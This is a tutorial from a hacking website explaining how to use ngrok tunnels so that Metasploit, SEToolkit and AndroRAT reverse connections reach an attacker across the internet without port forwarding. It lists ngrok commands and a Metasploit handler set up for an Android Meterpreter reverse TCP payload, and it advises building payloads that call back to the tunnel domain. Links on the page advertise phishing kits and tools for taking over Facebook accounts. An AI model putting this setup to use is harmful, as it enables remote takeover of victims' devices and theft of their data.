• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2017
  • July
  • 5
  • How to Use Metasploit, SEToolkit, AndroRAT Without Opening Ports in Kali Linux

How to Use Metasploit, SEToolkit, AndroRAT Without Opening Ports in Kali Linux

July 5, 2017July 27, 2019 Comments Off on How to Use Metasploit, SEToolkit, AndroRAT Without Opening Ports in Kali Linux
hacking without port forwarding ngrok port forwarding using androrat without portforwarding

It can be quite annoying when you have limited access to ports on a network and causes problems when pentesting, as you can only test traffic within the same network.

Unless of course you could open the correct ports from within the router default administration panel. There might be a time when access to administration panels are forbidden for example if you are using a mobile hotspot, sometimes you can’t detect corporate networks or you have spent the last hour and a half to learn how to do a port forward.

Whatever the case might be, here we will learn how to route your connections through a external secure tunnel and allowing us to use various pentesting tools such as Metasploit & SEToolkit outside our network.

  • First of all create a disposable email address using getnada.com or a similar disposable email service. getnada
  • Download ngrok In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once download has completed extract the Zip archive and then cd into it for example “cd ngrok”
    ngrok1
    Download Page For Ngrok I will be using NGrok 32 Bit in this tutorial if your using a 64 bit modern CPU then download 64 bit version of Ngrok
  • Install your authtoken (auth code below is a example copy auth token from ngrok.com account.Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
    Example Authtoken

    ./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

    ngrok2
    Screen Shot Shows Ngrok Auth Code

  • To create your first secure tunnel use the command below to set up a tunnel on port 80 I’m using http port 80 for SET use whatever port you would like ngrok to tunnel through.
    ./ngrok http 80

    Screen Shot shows ngrok successfully running a tunneling on HTTP port 80 the domain names in the screen shot are external domains of your tunnel.
  • Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice.Starting Metasploit First you will need to start Ngrok using tcp commands as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using command below../ngrok tcp 4444
    msfconsole

    Use your local host to set srvhost and lhost.

    set lhost 0.0.0.0
    set lport 4444
    set uripath /

    Use port you used to set up ngrok as srvport this will help us with tunneling a Metasploit or SEToolkit session through the Internet.

    In this tutorial I will set a handler up using settings above for Ngrok. Many reading this guide could be using complete different exploits to minify confusion we will be showing you set up a Reverse TCP Metapreter Listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.

    msfconsole
     msf  > use multi/handler
     msf exploit(handler) > set payload android/meterpreter/reverse_tcp
     msf exploit(handler) > set LHOST 0.0.0.0
     msf exploit(handler) > set srvhost 0.0.0.0
     msf exploit(handler) > set srvport 4444
     msf exploit(handler) > set uripath /
     msf exploit(handler) > exploit

    When your creating Payloads for Metasploit you will need to include your tunnel and also the port your using for Ngrok.

    When creating payloads use the domain provided by Ngrok or you can ping the domain to receive and IP and use the IP address from the results use the same port for payload as your listener.

    Example SEToolkit

    setoolkit
    Screen Shot Below Shows SEToolkit set up to use external host.

    This will work as a tunnel for many more pentesting tools this tutorial is not only limited to Metasploit and SEToolkit.

     

     

We have listed more tools below that will work with ngrok.

Using AndroRAT

Generating Payloads with FatRAT

Post navigation

Alexa – Go Hacker Mode
RED HAWK – All In One Tool For Information Gathering, SQL Vulnerability Scanning And Crawling

Related Articles

AsyncRAT – Open-Source Remote Administration Tool For Windows

- Remote Administration Tools
August 24, 2019

Slackor – A Golang implant that uses Slack as a CC2 Server

- Remote Access Tool, Remote Administration Tools
July 9, 2019

Loki – Remote Access Tool / Botnet

- Remote Administration Tools
June 17, 2019June 17, 2019
hacker gadgets
hacker phone covers

Recent Posts

mx-takeover: detects misconfigured MX records

mx-takeover: detects misconfigured MX records

July 7, 2022
Two Charged for Selling Counterfeit Oxycodone Pills

Two Charged for Selling Counterfeit Oxycodone Pills

July 7, 2022
pywhisker: Python tool for Shadow Credentials attacks

pywhisker: Python tool for Shadow Credentials attacks

July 7, 2022
CrackQL - GraphQL Password Brute-Force And Fuzzing Utility

CrackQL – GraphQL Password Brute-Force And Fuzzing Utility

July 7, 2022
CVE-2022-2274: OpenSSL Remote Code Execution Vulnerability

CVE-2022-2274: OpenSSL Remote Code Execution Vulnerability

July 6, 2022
Fraudulent Credit Card Maker Sentenced to 108 Months in Prison

Fraudulent Credit Card Maker Sentenced to 108 Months in Prison

July 6, 2022

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs
ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW